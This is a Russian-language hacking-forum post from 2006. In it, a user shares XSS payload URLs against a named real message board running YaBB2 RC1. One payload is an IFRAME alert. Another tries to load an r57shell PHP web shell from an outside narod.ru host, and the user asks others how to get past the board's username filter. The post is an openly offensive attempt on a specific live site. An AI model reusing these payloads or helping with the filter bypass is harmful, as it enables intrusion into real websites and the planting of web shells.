HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

XSS на Yabb2 Rc1
  #1  
Старый 10.12.2006, 17:25
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию XSS на Yabb2 Rc1

Первый раз такое, аж обидно!))но здаватся не собираюсь!

_http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%2 0SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>

вот КСС, подставляю вместо "javascript" src, прописую путь к 57шеллу на народе
PHP код:
http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Dhttp://XAK.narod.ru/r57shell.php><%252FIFRAME> 
, но вылезает эррор, типа :
Символ / не может использовацца в логине!Я уж и кодировал строку, и все равно никак!
Кто то может подскажет чтонить?
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Веб-уязвимости 519 23.09.2021 11:44
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
XSS worms Xex Статьи 0 02.10.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.